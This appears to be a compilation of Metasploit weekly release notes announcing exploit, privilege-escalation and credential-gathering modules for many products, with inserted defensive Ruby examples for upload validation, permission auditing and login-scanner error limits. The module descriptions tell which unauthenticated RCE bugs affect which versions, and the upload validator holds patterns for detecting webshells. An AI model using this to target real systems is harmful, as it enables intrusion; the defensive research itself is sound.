This week we’ve released a module written by first-time community contributor shr70 that can exploit roughly 45 different Zyxel router and VPN models. The module exploits a buffer overflow vulnerability that results in unauthenticated remote code execution on affected devices. It’s rare that we see a single module affect this many devices at once, and we are excited to see it ship in the framework. We hope pentesters and red-teamers alike can make good use of this module in their day-to-day operations.
Monitorr unauthenticated RCE
Community contributor h00die-gr3y strikes again, this time with a module for an unauthenticated RCE vulnerability in Monitorr. Monitorr is a simple web application that lets you set up a dashboard to monitor the up/down state of various websites and web applications. Vulnerable versions allow an attacker to upload a webshell tagged as a GIF image and execute malicious PHP code from the upload directory where the file is stored.
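As an added example (not Monitorr's code or the module's), this is the kind of server-side check that closes this class of upload bug: validate the extension against an allow list, require the content's leading bytes to match the claimed image type, refuse anything carrying PHP markers behind a valid image header, and name the stored file yourself instead of trusting the client's filename. The IMAGE_MAGIC, PHP_MARKERS, validate_image_upload and storage_name_for names are this example's own.

```ruby
# Added example (not Monitorr's code): server-side checks an upload handler can
# apply before storing a "GIF" so that an image-tagged PHP file is refused.
require 'securerandom'

# Expected leading bytes for each permitted extension.
IMAGE_MAGIC = {
  'gif' => ['GIF87a'.b, 'GIF89a'.b],
  'png' => ["\x89PNG\r\n\x1a\n".b],
  'jpg' => ["\xFF\xD8\xFF".b]
}.freeze

# Markers that betray PHP code hiding behind a valid image header.
PHP_MARKERS = [/<\?php/i, /<\?=/, /<script\b[^>]*language\s*=\s*["']?php/i].freeze

class UploadRejected < StandardError; end

# Returns the normalised extension when the upload passes every check;
# raises UploadRejected otherwise.
def validate_image_upload(filename, data)
  base = File.basename(filename)
  # "shell.php.gif" style names are refused outright.
  raise UploadRejected, 'double extension' if base.count('.') != 1

  ext = File.extname(base).downcase.delete_prefix('.')
  ext = 'jpg' if ext == 'jpeg'
  raise UploadRejected, "extension #{ext.inspect} not allowed" unless IMAGE_MAGIC.key?(ext)

  bytes = data.b
  unless IMAGE_MAGIC[ext].any? { |magic| bytes.start_with?(magic) }
    raise UploadRejected, "content does not look like a #{ext}"
  end
  raise UploadRejected, 'PHP code embedded in image' if PHP_MARKERS.any? { |re| bytes.match?(re) }

  ext
end

# Name the stored file ourselves (never from the client) so the original
# filename cannot influence how the web server treats the file.
def storage_name_for(ext)
  "#{SecureRandom.hex(16)}.#{ext}"
end
```

Even with these checks in place, the upload directory should be served with script execution disabled (no PHP handler mapped to that path): content validation is a filter, while the handler configuration is the boundary that keeps a stored file from ever running as code.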
More Metasploit Twitch Streaming
In case you missed it or were previously unaware, our very own Spencer McIntyre has been doing live exploit development on Twitch on the second Friday of the month at 4pm EST. This past week Spencer (aka zerosteiner) shared in real time the trials and tribulations of reverse engineering an authenticated SolarWinds Information Service deserialization RCE. The pull request for this work can be found here: https://github.com/rapid7/metasploit-framework/pull/17785. In the live stream he explained how he takes a blog post with limited technical details, then decompiles and debugs the application to figure out what makes the vulnerability tick. Come watch the next one on Friday, April 14th, at https://www.twitch.tv/zerosteiner; there’s a good chance you’ll learn something new, and be sure to invite your family and friends!
New module content (4)
Zyxel Unauthenticated LAN Remote Code Execution
Authors: Gerhard Hechenberger, SEC Consult Vulnerability Lab, Stefan Viehboeck, Steffen Robertz, and Thomas Weber
Type: Exploit
Pull request: #17388 contributed by shr70
Description: This PR adds a new exploit module for a buffer overflow in roughly 45 different Zyxel router and VPN models.
Authors: Lyhins Lab and h00die-gr3y
Type: Exploit
Pull request: #17771 contributed by h00die-gr3y
AttackerKB reference: CVE-2020-28871
Description: This adds a module that exploits an unauthenticated file upload vulnerability in various versions of Monitorr. RCE as the user under which the software runs can be achieved due to insufficient validation on GIF uploads.
Open Web Analytics 1.7.3 – Remote Code Execution (RCE)
Authors: Dennis Pfleger and Jacob Ebben
Type: Exploit
Pull request: #17754 contributed by Pflegusch
AttackerKB reference: CVE-2022-24637
Description: This adds an exploit module for CVE-2022-24637, a single/double quote confusion vulnerability in Open Web Analytics versions below 1.7.4. This leads to the disclosure of sensitive information in an automatically generated PHP cache file, which can be leveraged to gain admin privileges and remote code execution.
Description: This adds a post module that collects and decrypts credentials from WhatsUp Gold installs.
Enhancements and features (2)
#17401 from araout42 – This PR adds a new x86 XOR polymorphic encoder.
#17583 from cgranleese-r7 – Enhances msfconsole’s info -d command, which is used to generate browser Metasploit module documentation, to additionally include references to AttackerKB.
#17783 from adfoster-r7 – An update has been made to the reload_lib command so that it continues to reload files even if a single file fails to load.
#17784 from dwelch-r7 – Reduces the number of files loaded when msfconsole starts up. This was a performance regression introduced by a recent Rails upgrade.
#17792 from adfoster-r7 – Fixes an external module crash when running the auxiliary/scanner/wproxy/att_open_proxy module.
#17794 from adfoster-r7 – Update external modules to support python3.11.
#17798 from adfoster-r7 – The debug --datastore command was previously causing a stacktrace due to some incorrect operations. These have since been fixed so that users can now use debug --datastore to output debug information along with the datastore information.
#17802 from zeroSteiner – Updates Python pingback payloads such as payload/python/pingback_reverse_tcp to no longer crash when viewing info or generating.
Documentation added (1)
#17795 from adfoster-r7 – This PR adds documentation on debugging and running external python modules.
You can always find more documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Whilst we did have a few cool new modules added this week, one particularly interesting one was a Fortinet FortiNAC vulnerability, CVE-2022-39952, that was added in by team member Jack Heysel. This module exploits an unauthenticated RCE in Fortinet FortiNAC versions 9.4.0, 9.2.0 through 9.2.5, 9.1.0 through 9.1.7, 8.8.0 through 8.8.11, 8.7.0 through 8.7.6, 8.6.0 through 8.6.5, 8.5.0 through 8.5.4, and 8.3.7 to gain root level access to affected devices. This bug has seen active exploitation in the wild from several threat feeds such as ShadowServer at https://twitter.com/Shadowserver/status/1628140029322362880, so definitely patch if you haven’t done so already.
Tomcat Gives Me All The Shells
One other exploit we did want to call out this week was a local privilege escalation on Apache Tomcat prior to 7.0.54-8. Tomcat is widely deployed in a lot of environments, and this PR, exploiting CVE-2016-5425, allows you to escalate from an authenticated user to full root control over a web server by exploiting a file permissions issue. These vulnerabilities can be quite beneficial to attackers looking to gain further access to a network as often they will compromise a web server and then use that web server to start pivoting deeper into the network. Gaining root access to a web server can further assist them with these efforts. It’s also rather unusual to see a web server specifically being used to assist with local privilege escalation as most exploits tend to focus on using them to gain initial access, so we appreciate the efforts from h00die to add this into Metasploit.
Authors: Gwendal Guégniaud, Zach Hanley, and jheysel-r7
Type: Exploit
Pull request: #17750 contributed by jheysel-r7
AttackerKB reference: CVE-2022-39952
Description: A new exploit has been added for CVE-2022-39952, a vulnerability in FortiNAC’s keyUpload.jsp page which allows for arbitrary file write as an unauthenticated user. Successful exploitation results in unauthenticated RCE in the context of the root user, giving full control over the target device.
Apache Tomcat on RedHat Based Systems Insecure Temp Config Privilege Escalation
Authors: Dawid Golunski and h00die
Type: Exploit
Pull request: #17509 contributed by h00die
AttackerKB reference: CVE-2016-5425
Description: This PR adds an exploit that targets a vulnerability in RedHat based systems where improper file permissions are applied to /usr/lib/tmpfiles.d/tomcat.conf for Apache Tomcat versions before 7.0.54-8, allowing attackers to inject commands into the systemd-tmpfiles service to write a cron job that will execute their payload. Successful exploitation should result in privilege escalation to the root user.
Bitbucket Environment Variable RCE
Authors: Ry0taK, Shelby Pace, and y4er
Type: Exploit
Pull request: #17775 contributed by space-r7
AttackerKB reference: CVE-2022-43781
Description: This adds an exploit module for CVE-2022-43781, an authenticated command injection vulnerability in various versions of Bitbucket. Arbitrary command execution is done by injecting specific environment variables into a user name and coercing the Bitbucket application into generating a diff. This module requires at least admin credentials. Successful exploitation results in RCE as the atlbitbucket user.
Enhancements and features (1)
#17757 from adfoster-r7 – Updates the formatting logic for the info command to improve the readability of the module description. Previously the module description was squashed into a single line; now each paragraph, bullet list, etc. is rendered on its own new lines.
Bugs fixed (1)
#17774 from adfoster-r7 – A bug has been fixed when displaying the Metasploit banner due to use of an undefined function; this has been updated to use the proper function.
Documentation added (1)
#17780 from gwillcox-r7 – This updates the list of mentors for GSoC 2023.
Wowza, a new credential gatherer and login scanner!
This week Metasploit Framework gained a credential gatherer for Wowza Streaming Engine Manager. Credentials for this application are stored in a file named admin.password in a known location; the file is readable by BUILTIN\Users by default on Windows and is world-readable on Linux. The module was written by community contributor bcoles, who also wrote a login scanner for Wowza this week. The login scanner can be used to validate the credentials found by the gatherer, so the two modules complement each other quite nicely.
New module content (3)
Wowza Streaming Engine Manager Login Utility
Author: bcoles
Type: Auxiliary
Pull request: #17733 contributed by bcoles
Description: This adds a login scanner module to brute force credentials of Wowza Streaming Engine Manager.
Authors: Sw33t.0day and h00die-gr3y
Type: Exploit
Pull request: #17507 contributed by h00die-gr3y
AttackerKB reference: CVE-2023-22952
Description: A module has been added which exploits CVE-2023-22952, a RCE vulnerability in SugarCRM 11.0 Enterprise, Professional, Sell, Serve, and Ultimate versions prior to 11.0.5 and SugarCRM 12.0 Enterprise, Sell, and Serve versions prior to 12.0.2. Successful exploitation as an unauthenticated attacker will result in remote code execution as the user running the web services, which is typically www-data.
Gather Wowza Streaming Engine Credentials
Author: bcoles
Type: Post
Pull request: #17737 contributed by bcoles
Description: This adds a post module that collects Wowza Streaming Engine user credentials from the admin.password local configuration file. This file is world-readable by default on Linux and readable by BUILTIN\Users on Windows.
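Both the Wowza gatherer above and the Tomcat tmpfiles.d escalation described earlier on this page (improper permissions on /usr/lib/tmpfiles.d/tomcat.conf) come down to file permissions that the operating system already reports, so a periodic audit catches them before a session does. The following is an added example, not code from either module: it checks a tmpfiles.d directory for configs writable by anyone other than the owner, and checks a credential file such as admin.password for being readable by group or world. The audit_path, audit_tmpfiles_dir and demo_audit names and the constructed files are this example's own; it inspects POSIX mode bits only, so the Windows BUILTIN\Users ACL case is outside its scope.

```ruby
# Added example (not the Metasploit modules' code): a POSIX permission audit
# for the two conditions the page describes, a writable config consumed by a
# privileged service (tmpfiles.d) and a credential file readable by everyone.
require 'fileutils'
require 'tmpdir'

# Returns human-readable findings for one path. Writable-by-others is always
# reported; readable-by-others only when the file is declared a secret.
def audit_path(path, secret: false)
  return ["#{path}: missing"] unless File.exist?(path)

  mode = File.stat(path).mode & 0o777
  octal = format('%04o', mode)
  findings = []
  findings << "#{path}: world-writable (#{octal})" if mode & 0o002 != 0
  findings << "#{path}: group-writable (#{octal})" if mode & 0o020 != 0
  if secret
    findings << "#{path}: world-readable (#{octal})" if mode & 0o004 != 0
    findings << "#{path}: group-readable (#{octal})" if mode & 0o040 != 0
  end
  findings
end

# Every *.conf under a tmpfiles.d directory is parsed by systemd-tmpfiles as
# root, so none of them may be writable by anyone but the owner.
def audit_tmpfiles_dir(dir)
  Dir.glob(File.join(dir, '*.conf')).sort.flat_map { |conf| audit_path(conf) }
end

# Builds a throwaway tree with constructed files that reproduce both
# conditions, runs the audit, and returns the findings.
def demo_audit
  Dir.mktmpdir('perm-audit') do |root|
    tmpfiles = File.join(root, 'tmpfiles.d')
    FileUtils.mkdir_p(tmpfiles)
    conf = File.join(tmpfiles, 'tomcat.conf')
    File.write(conf, "d /var/log/tomcat 0770 tomcat tomcat -\n") # constructed content
    File.chmod(0o666, conf) # constructed: writable by everyone

    password = File.join(root, 'admin.password')
    File.write(password, "admin placeholder-password\n") # constructed content
    File.chmod(0o644, password) # constructed: the world-readable default the page describes

    { tmpfiles: audit_tmpfiles_dir(tmpfiles), password: audit_path(password, secret: true) }
  end
end

puts demo_audit if $PROGRAM_NAME == __FILE__
```

Pointing audit_tmpfiles_dir at /etc/tmpfiles.d and /usr/lib/tmpfiles.d, and audit_path at any file a service reads secrets from, turns this into a quick host check; the findings are strings so they can be dropped straight into a log line or a ticket.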
Enhancements and features (9)
#17675 from adfoster-r7 – Updates the admin/kerberos/forge_ticket module to support a new extra_sids option, which can be useful for including cross-domain SIDs when forging external Kerberos trust tickets as part of cross-trust domain escalation. The admin/kerberos/inspect_ticket module has also been updated to support viewing these extra SID values.
#17686 from zeroSteiner – This adds 3 additional methods to the existing PetitPotam module to make it work even if the patch for CVE-2021-36942 has been installed. Note that it won’t work after the December 2021 patch.
#17715 from zeroSteiner – The Metasploit Payload gem has been bumped to 2.0.115, bringing in support for the arp command to Python Meterpreter on Linux, and adding support for displaying IPv6 routing tables using the route command on Windows.
#17727 from rohitkumarankam – Two new options have been added to the login scanner library: max_consecutive_error_count and max_error_count. These options allow users to set the maximum number of errors that are allowed to occur when connecting as well as the maximum number of consecutive errors that are allowed when connecting before the login scanner will give up on a target.
#17744 from adfoster-r7 – The code for msfconsole has been updated so that performance profiling can also take into account the time it takes to load msfenv and console related libraries, thereby allowing for more accurate performance profiling.
#17745 from gwillcox-r7 – This updates the metasploit-payloads gem to pull in changes to the Python Meterpreter on Windows to add the route add and route delete commands as well as the ability to get process information such as process names and paths.
#17746 from todb-r7 – The data/wordlists/password.lst password list has been updated to include the master password that LastPass suggests as an example when a user goes to create a new master password, r50$K28vaIFiYxaY, into the password list, as well as to fix some encoding issues.
#17749 from adfoster-r7 – Updates the auxiliary/admin/kerberos/keytab.rb module to additionally export any NTHASHES, which can be useful for decrypting Kerberos network traffic in Wireshark.
#17756 from adfoster-r7 – Updates secrets dump to generate the Kerberos RC4 key for the machine account.
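To make the two error budgets from #17727 concrete, here is an added example, not the framework's LoginScanner code, of a scan loop that gives up on a target when either max_consecutive_error_count or max_error_count is reached. The outcome symbols, the order in which the two limits are checked, and the constructed SIMULATED_OUTCOMES table are assumptions of this example.

```ruby
# Added example (not Metasploit's LoginScanner code): the give-up logic that
# max_error_count and max_consecutive_error_count describe, as a stand-alone
# loop. Outcome names and check order are assumptions made for this example.

# Tries each credential via the given block, which returns :success, :fail
# (credentials rejected) or :error (the attempt could not be completed).
# Stops early once either error budget is exhausted and reports why.
def scan_credentials(credentials, max_error_count:, max_consecutive_error_count:)
  total_errors = 0
  consecutive_errors = 0
  results = []

  credentials.each do |cred|
    outcome = yield(cred)
    results << [cred, outcome]

    if outcome == :error
      total_errors += 1
      consecutive_errors += 1
      if consecutive_errors >= max_consecutive_error_count
        return { results: results, stopped: :consecutive_errors, errors: total_errors }
      end
      if total_errors >= max_error_count
        return { results: results, stopped: :total_errors, errors: total_errors }
      end
    else
      consecutive_errors = 0 # a completed attempt, successful or not, resets the streak
    end
  end

  { results: results, stopped: nil, errors: total_errors }
end

# Constructed outcomes standing in for a flaky target: connection errors
# interleaved with ordinary failed logins and one valid pair.
SIMULATED_OUTCOMES = {
  'admin:admin'    => :error,
  'admin:password' => :error,
  'admin:wowza'    => :fail,
  'admin:letmein'  => :error,
  'admin:changeme' => :error,
  'admin:secret'   => :error,
  'admin:correct'  => :success
}.freeze

def simulated_login(cred)
  SIMULATED_OUTCOMES.fetch(cred, :fail)
end

def run_demo(max_error_count:, max_consecutive_error_count:)
  scan_credentials(SIMULATED_OUTCOMES.keys,
                   max_error_count: max_error_count,
                   max_consecutive_error_count: max_consecutive_error_count) { |c| simulated_login(c) }
end
```

The distinction matters operationally: a streak of consecutive errors usually means the target is down, rate-limiting or blocking you, so stopping early avoids both wasted time and needless noise in the target's logs, while the total count bounds how long a scanner keeps retrying a host that is intermittently unreachable.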
Bugs fixed (8)
#17673 from bcoles – lib/msf/core/payload/apk.rb has been updated so that by default it only decompiles the main classes instead of all classes, fixing some issues whereby decompiling all classes would prevent creation of a backdoored APK. This also bumps up the minimum apktool version to 2.4.1 and makes it so that versions prior to 2.7.0 of apktool will throw a warning about being potentially out of date.
#17716 from zeroSteiner – A bug has been fixed whereby the reverse port forward information message was displayed incorrectly, and the same information was shown on both the local and remote parts of the message.
#17721 from zeroSteiner – This fixes an issue where payloads that were adapted failed when stage encoding was enabled because the stage encoding was based on the stager arch and platform values. These values were always the same until we introduced adapted payloads, which can vary.
#17723 from jvoisin – A bug has been fixed in the modules/encoders/php/base64.rb encoder whereby strings were being passed as literal strings without being properly quoted, which could result in errors on newer versions of PHP.
#17726 from zeroSteiner – The Metasploit Payloads gem has been updated bringing in initial support for attaching to processes on Python Meterpreter shells on Windows, a bug fix for the route command on newer versions of Windows on Windows Meterpreter, and a fix so that both C Meterpreter and Python Meterpreter sessions will attempt to enable the same set of permissions when running getprivs.
#17729 from bcoles – Fixes an edge case crash when running Ruby 3.2.
#17738 from adfoster-r7 – Fixes a Ruby 3.2 crash when running certain tools.
#17758 from zeroSteiner – The metasploit-payloads gem has been bumped to fix a token handle leak that was causing Python Meterpreters to leave dangling handles after using getprivs, fix an error in packet_transmit_http whereby error codes were not appropriately returned, and update the arp command to properly return the interface name instead of the index for the interface column.
Documentation added (3)
#17684 from adfoster-r7 – This PR adds the RBCD exploitation documentation to the docs site.
#17688 from adfoster-r7 – This PR fixes several broken wiki links and adds validation so that users don’t use the wrong syntax when making docs changes.
#17743 from adfoster-r7 – A new page has been added to explain the METASPLOIT_CPU_PROFILE and METASPLOIT_MEMORY_PROFILE options and to explain how to profile msfconsole’s and msfvenom’s performance on systems.
Rapid7’s broader vulnerability research team released our 2022 Vulnerability Intelligence Report this week. The report includes Metasploit and research team data on exploitation, exploitability, and vulnerability profiles that are intended to help security teams understand and prioritize risk more effectively. Put simply, security teams have way too much to do in a threat climate that’s seen some pretty crazy escalation the past few years, and understanding attack trends can help them make better risk-based choices.
There are some longer threads on key findings on Twitter and Mastodon. Some of the highlights:
Rapid7 researchers saw a modest decrease in both widespread exploitation and zero-day exploitation of new vulnerabilities in 2022. Alas, widespread threats are still the majority of 2022 vulnerabilities in our dataset, and are double what they were in 2020.
Attackers keep getting faster — more than half the vulns in the report were exploited within a week.
Ransomware CVE stats got weird in 2022. There are probably a lot of intersectional reasons for this.
Author: Imran E. Dawoodjee
Type: Auxiliary
Pull request: #17676 contributed by ide0x90
Description: This adds a login module for the Softing Secure Integration Server software.
Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload
Authors: HMs, l1k3beef, and sf
Type: Exploit
Pull request: #17624 contributed by sfewer-r7
AttackerKB reference: CVE-2022-21587
Description: This pull request adds an exploit module for an arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle E-Business Suite versions 12.2.3 through to 12.2.11, which results in remote code execution. This has been observed to have been exploited in the wild.
Lucee Authenticated Scheduled Job Code Execution
Author: Alexander Philiotis
Type: Exploit
Pull request: #17638 contributed by JBince
Description: This adds a module to execute code using Lucee’s scheduled job functionality. The feature requires authentication as an administrator by default and allows a ColdFusion page to be rendered which is used to execute an OS command using the cfexecute directive. The module works on both Linux and Windows targets.
Disable ClamAV
Author: DLL_Cool_J
Type: Post
Pull request: #17672 contributed by archcloudlabs
Description: This PR includes a post module that will disable ClamAV on Linux systems. The bug resides in the ClamAV Unix socket permitting any user to submit the "shutdown" command which will disable ClamAV.
Enhancements and features (2)
#17635 from dwelch-r7 – Updates the admin/kerberos/inspect_ticket module to display the ticket checksum and full PAC checksum.
#17699 from gwillcox-r7 – This adds SCHANNEL authentication support to LDAP modules.
Bugs fixed (5)
#17562 from gwillcox-r7 – This fixes some incorrect Railgun definitions for the wldap32 Windows library.
#17679 from adfoster-r7 – This PR fixes the broken payload selection for Metasploit RPC.
#17696 from zeroSteiner – The version of Metasploit Payloads in use by Metasploit has been bumped, which brings in support for the getprivs and getdesktop commands to Python Meterpreters running on Windows, and also adds support for getting the handle of processes opened via the session. Additionally, fixes were made to support Python 2.5 and to fix the getdesktop output of Python Meterpreters.
#17697 from jheysel-r7 – This updates the exploit/linux/http/froxlor_log_path_rce module to note that Froxlor 2.0.7 is the last vulnerable version.
#17700 from zeroSteiner – The argument validation for the route command has been reworked to improve the way it validates arguments and to print out more accurate error messages.
Documentation added (3)
#17680 from adfoster-r7 – Improves the UX of the docs.metasploit.com module explorer. Adds ‘expand all’ and ‘collapse all’ buttons to the module explorer. Adds support for automatically opening descendant folders that only contain 1 item. Adds an additional parent folder to make it clearer to the user that the folders are clickable.
#17687 from archcloudlabs – This PR contains additional examples on the ERB format required for the HTTPRawHeaders option for HTTP clients.
This week two improvements were made to the script/resource/basic_discovery.rc resource script. The first update from community member samsepi0x0 allowed commas in the RHOSTS value, making it easier to target multiple hosts. Additionally, adfoster-r7 improved the script by adding better handling for error output. This continues our trend of trying to provide more useful diagnostic information to our end users.
Google Summer of Code
The Metasploit Framework has been accepted to participate in Google’s Summer of Code program again for 2023. This event pairs new contributors with an experienced mentor as they work on an open source project (Metasploit in our case). We will soon be soliciting project proposals from the community for anyone interested in getting involved. Some project ideas are on the docs site, but folks are welcome to submit entirely new ideas for something they think would benefit the Metasploit community.
Web Based Module Counts
This week, adfoster-r7 improved our docs site with a running count of all the published modules. This information is kept up to date automatically and is a great resource for anyone looking for how many modules Metasploit has included without needing to install and start the framework. The page even allows users to dive deeper into types of modules and platforms in the same way as msfconsole.
New module content (2)
Froxlor Log Path RCE
Authors: Askar and jheysel-r7
Type: Exploit
Pull request: #17640 contributed by jheysel-r7
AttackerKB reference: CVE-2023-0315
Description: This module exploits a vulnerability in versions of Froxlor prior to 2.0.8 that allows an authenticated user to change the default log file to an arbitrary path on the system. Using this, an authenticated user can write a Twig template that, when rendered, will execute arbitrary code and grant a shell or Meterpreter session as the www-data user.
pyLoad js2py Python Execution
Authors: Spencer McIntyre and bAu
Type: Exploit
Pull request: #17652 contributed by zeroSteiner
AttackerKB reference: CVE-2023-0297
Description: This adds an exploit for CVE-2023-0297, an unauthenticated JavaScript injection in pyLoad’s Click ‘N’ Load service.
Enhancements and features (1)
#17674 from adfoster-r7 – Updates the script/resource/basic_discovery.rc script to better detect when the Metasploit database is not connected as well as improving error output.
Bugs fixed (2)
#17650 from samsepi0x0 – Updates the script/resource/basic_discovery.rc script to support commas in RHOSTS values.
#17660 from bugch3ck – This updates the location of where registry hives are temporarily stored by the windows_secrets_dump module.
#17663 from manishkumarr1017 – This fixes an issue where action names were being treated as case sensitive.
Documentation added (2)
#17637 from adfoster-r7 – This PR adds the latest module information to docs.metasploit.com as a quick way to explore Metasploit’s available modules.
#17685 from samsepi0x0 – Fixes a broken link within Metasploit’s Google Summer of Code 2023 Project Ideas.
Thanks to community contributor neterum, Metasploit Framework just gained an awesome new module which targets Cisco Small Business RV Series Routers. The module actually exploits two vulnerabilities, an authentication bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), in order to achieve code execution in the context of the www-data user.
New module content (2)
Cisco RV Series Authentication Bypass and Command Injection
Authors: Biem Pham, Neterum, and jbaines-r7
Type: Exploit
Pull request: #17599 contributed by neterum
AttackerKB reference: CVE-2022-20707
Description: An exploit for Cisco RV160, RV260, RV340 and RV345 Small Business Routers prior to firmware version 1.0.03.26 has been added which exploits CVE-2022-20705, an authentication bypass, and CVE-2022-20707, a command injection vulnerability, to achieve remote code execution as the www-data user on affected devices as an unauthenticated attacker.
GitLab GitHub Repo Import Deserialization RCE
Authors: Heyder Andrade, RedWay Security, and William Bowling (vakzz)
Type: Exploit
Pull request: #17281 contributed by heyder
AttackerKB reference: CVE-2022-2992
Description: This adds an exploit for CVE-2022-2992, an authenticated remote command execution vulnerability in GitLab.
Enhancements and features (1)
#17594 from zeroSteiner – The DLL template code has been updated so that tools such as msfvenom can use DLL templates with payloads that were larger than 4096 bytes, such as unstaged payloads. Note that this update only applies to the default DLL templates that Metasploit provides, and not to external DLL templates which are restricted to 4096 bytes at this time.
Bugs fixed (1)
#17645 from adfoster-r7 – Fixes a bug that caused warnings to be output on Arch Linux environments when starting msfconsole.
Taking a stroll down memory lane (Tomcat Init Script Privilege Escalation)
Do you remember the issue with the Tomcat init script, originally discovered by Dawid Golunski back in 2016, that led to privilege escalation? This week’s Metasploit release includes an exploit module for CVE-2016-1240 by h00die. This vulnerability allows any local user who already has a tomcat account to escalate privileges and gain access to the target system as root. This exploit can be used against the following Tomcat versions: Tomcat 8 (8.0.36-2), Tomcat 7 (7.0.70-2) and Tomcat 6 (6.0.45+dfsg-1~deb8u1).
Lenovo Diagnostics Driver IOCTL memmove
Our own Jack Heysel contributed an exploit module for CVE-2022-3699 using the proof of concept created by alfarom256. A vulnerability within Lenovo Diagnostics Driver due to incorrect access control allows low-privileged users to issue device IOCTLs to perform arbitrary physical/virtual memory read/write.
New module content (8)
Nagios XI 5.5.6 to 5.7.5 – ConfigWizards Authenticated Remote Code Execution
Author: Matthew Mathur
Type: Exploit
Pull request: #17494 contributed by k0pak4
AttackerKB reference: CVE-2021-25298
Description: A new authenticated RCE module for NagiosXI has been added which exploits CVE-2021-25296, CVE-2021-25297, and CVE-2021-25298 to get a shell as the apache user on NagiosXI devices running version 5.5.6 to 5.7.5 inclusive.
F5 Big-IP Create Admin User
Author: Ron Bowes
Type: Exploit
Pull request: #17392 contributed by rbowes-r7
Description: This PR adds a privilege escalation module for F5 that uses the unsecured MCP socket to create a new root account.
Apache Tomcat on Ubuntu Log Init Privilege Escalation
Authors: Dawid Golunski and h00die
Type: Exploit
Pull request: #17483 contributed by h00die
AttackerKB reference: CVE-2016-1240
Description: Adds a new exploit/linux/local/tomcat_ubuntu_log_init_priv_esc module for CVE-2016-1240 targeting Tomcat (6, 7, 8). By default, repositories on Debian-based distributions (including Debian, Ubuntu, etc.) provide a vulnerable tomcat init script that allows local attackers who have already gained access to the tomcat account (for example, by exploiting an RCE vulnerability in a Java web application hosted on Tomcat, uploading a webshell, etc.) to escalate their privileges from the tomcat user to root and fully compromise the target system.
Fortra GoAnywhere MFT Unsafe Deserialization RCE
Author: Ron Bowes
Type: Exploit
Pull request: #17607 contributed by rbowes-r7
AttackerKB reference: CVE-2023-0669
Description: This PR adds a module that exploits CVE-2023-0669, which is an object deserialization vulnerability in Fortra GoAnywhere MFT.
ManageEngine ADSelfService Plus Unauthenticated SAML RCE
Authors: Christophe De La Fuente, Khoa Dinh, and horizon3ai
Type: Exploit
Pull request: #17556 contributed by cdelafuente-r7
AttackerKB reference: CVE-2022-47966
Description: This PR adds an exploit that uses an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ADSelfService Plus versions 6210 and below (https://github.com/advisories/GHSA-4w3v-83v8-mg94).
ManageEngine ServiceDesk Plus Unauthenticated SAML RCE
Authors: Christophe De La Fuente, Khoa Dinh, and horizon3ai
Type: Exploit
Pull request: #17527 contributed by cdelafuente-r7
AttackerKB reference: CVE-2022-47966
Description: This adds an exploit for an unauthenticated remote code execution vulnerability that affects Zoho ManageEngine ServiceDesk Plus versions 14003 and below (https://github.com/advisories/GHSA-4w3v-83v8-mg94).
ManageEngine Endpoint Central Unauthenticated SAML RCE
Authors: Christophe De La Fuente, Khoa Dinh, h00die-gr3y, and horizon3ai
Type: Exploit
Pull request: #17567 contributed by h00die-gr3y
AttackerKB reference: CVE-2022-47966
Authors: alfarom256 and jheysel-r7
Type: Exploit
Pull request: #17371 contributed by jheysel-r7
AttackerKB reference: CVE-2022-3699
Description: This PR adds a module that makes use of incorrect access control for the Lenovo Diagnostics Driver allowing a low-privileged user the ability to issue device IOCTLs to perform arbitrary physical/virtual memory read/write.
Enhancements and features (3)
#17597 from bcoles – Fix notes for SideEffects and Reliability in the auxiliary/dos/mirageos/qubes_mirage_firewall_dos module.
#17603 from dwelch-r7 – Updates admin/kerberos/inspect_ticket to show the UPN and DNS Information within a decrypted PAC.
#17615 from adfoster-r7 – Adds missing module notes for stability, reliability, and side effects to several modules.
Bugs fixed (2)
#17591 from zeroSteiner – A bug has been fixed in metasm_shell and nasm_shell whereby the shells were using readline but the dependency wasn’t correctly imported. This has since been fixed and improved validation has been added.
#17592 from zeroSteiner – A bug has been fixed in the bypassuac_injection_winsxs module whereby a string was not properly being treated as being NULL terminated. Additionally, the definitions of the FindFirstFileA and FindFirstFileW functions have been corrected so that they work on x64 systems.
Documentation added (3)
#17398 from bwatters-r7 – Adds additional details on using command stagers.
#17587 from adfoster-r7 – This PR updates docs.metasploit.com to use the latest Ruby conventions.
#17595 from mkonda – Updates the documentation on debugging dead Meterpreter sessions to use the correct option name ReverseListenerBindAddress.
You can always find more documentation on our docsite at docs.metasploit.com.
Get it
As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:
If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).
Earlier this week we announced the release of Metasploit 6.3 which came with a tonne of new modules and improvements.
The whole team worked super hard on this and we’re very excited that everyone can now get their hands on it and all of the new features it has to offer!
I won’t go over everything we did here because we have a whole separate blog post dedicated to the 6.3 release that you should check out if you missed it.
Dirty Cow available on macOS
We have a new module provided by timwr to exploit Dirty Cow on macOS. This module exploits a race condition in the kernel that gives the opportunity for a user to get code execution as root.
New module content (5)
CWP login.php Unauthenticated RCE
Authors: Numan Türle and Spencer McIntyre
Type: Exploit
Pull request: #17511 contributed by zeroSteiner
AttackerKB reference: CVE-2022-44877
Description: Adds an exploit for CVE-2022-44877 which is an unauthenticated command injection in CentOS Control Web Panel <0.9.8.1147. Successful exploitation results in code execution as the root user.
io_uring Same Type Object Reuse Priv Esc
Authors: Mathias Krause, Ryota Shiga, and h00die
Type: Exploit
Pull request: #17301 contributed by h00die
AttackerKB reference: CVE-2022-1043
Description: This module exploits Linux LPE CVE-2022-1043, a bug in io_uring leading to an additional put_cred() that can be exploited to hijack credentials of other processes.
vmwgfx Driver File Descriptor Handling Priv Esc
Authors: Mathias Krause and h00die
Type: Exploit
Pull request: #17300 contributed by h00die
AttackerKB reference: CVE-2022-22942
Description: This PR adds a Linux privilege escalation against VMware virtual machines running kernels 4.14-rc1 – 5.17-rc1, caused by a bug in the VMware vmwgfx driver.
macOS Dirty Cow Arbitrary File Write Local Privilege Escalation
Authors: Ian Beer, Zhuowei Zhang, and timwr
